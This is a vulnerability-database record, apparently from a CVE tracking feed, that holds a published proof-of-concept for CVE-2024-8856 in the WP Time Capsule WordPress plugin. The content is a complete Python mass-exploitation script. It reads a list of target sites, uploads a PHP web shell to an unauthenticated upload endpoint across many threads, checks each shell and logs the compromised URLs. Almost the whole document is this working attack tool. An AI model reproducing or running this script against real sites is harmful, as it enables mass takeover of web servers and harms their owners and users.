{"uuid": "f4ef3f00-ed59-450f-a0df-a542ef01745f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-8856", "type": "published-proof-of-concept", "source": "https://t.me/DEVIL_La_RSx/762", "content": "# -*- coding: utf-8 -*-\nimport requests\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport os\nimport sys\nimport time\n\nprint(\"\"\"\n=========================================\n Exploit Script - CVE-2024-8856\n WordPress Plugin: WP Time Capsule\n Fully Automated Shell Uploader\n=========================================\n\"\"\")\n\n# Read the target list\nfile_path = input(\"Enter the path to the file containing target URLs: \").strip()\nif not os.path.exists(file_path):\n print(\"Error: File not found. Please check the path and try again.\")\n sys.exit()\n\ntry:\n with open(file_path, 'r') as file:\n urls = [line.strip() for line in file if line.strip()]\nexcept Exception as e:\n print(f\"Error reading file: {e}\")\n sys.exit()\n\n# Choose shell upload type\nuse_custom_shell = input(\"Do you want to upload a custom shell file? (yes/no): \").strip().lower()\nif use_custom_shell == \"yes\":\n shell_file_path = input(\"Enter the path to your custom PHP shell file: \").strip()\n if not os.path.exists(shell_file_path):\n print(\"Error: Custom shell file not found.\")\n sys.exit()\n try:\n with open(shell_file_path, \"r\") as f:\n php_payload = f.read()\n except Exception as e:\n print(f\"Error reading custom shell file: {e}\")\n sys.exit()\nelse:\n print(\"Using the default base64-encoded simple PHP shell.\")\n php_payload = \"\"\"\"\"\"\n\n# Define headers\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n}\n\n# Function to upload shell\ndef upload_shell(url):\n endpoint = '/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php'\n target_url = url + endpoint\n files = {\n \"files\": (\"shell.php\", php_payload, \"application/php\"),\n }\n\n try:\n print(f\"[*] Attempting to upload shell to {target_url}\")\n response = requests.post(target_url, files=files, headers=headers, timeout=10)\n\n if response.status_code == 200:\n shell_url = f\"{url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/shell.php\"\n verification = requests.get(shell_url, headers=headers, timeout=10)\n \n if verification.status_code == 200:\n print(f\"[+] Shell uploaded successfully: {shell_url}\")\n with open(\"successfully_uploaded.txt\", \"a\") as success_file:\n success_file.write(shell_url + \"\\n\")\n return True\n else:\n print(f\"[-] Failed to verify shell at {shell_url}\")\n else:\n print(f\"[-] Upload failed for {target_url} (Status Code: {response.status_code})\")\n except requests.exceptions.RequestException as e:\n print(f\"[-] Connection failed for {url}. Error: {str(e)}\")\n return False\n\n# Multithreading setup\ndef process_targets(url_list, threads=10):\n print(f\"[*] Starting scan with {threads} threads...\")\n start_time = time.time()\n\n pool = ThreadPool(threads)\n pool.map(upload_shell, url_list)\n pool.close()\n pool.join()\n\n elapsed_time = time.time() - start_time\n print(f\"[*] Scan completed in {elapsed_time:.2f} seconds.\")\n\n# Main Execution\nif __name__ == \"__main__\":\n num_threads = input(\"Enter the number of threads to use (default 10): \").strip()\n if not num_threads.isdigit():\n num_threads = 10\n else:\n num_threads = int(num_threads)\n\n process_targets(urls, num_threads)\n print(\"[*] Check 'successfully_uploaded.txt' for successful uploads.\")", "creation_timestamp": "2024-11-22T10:05:09.000000Z"}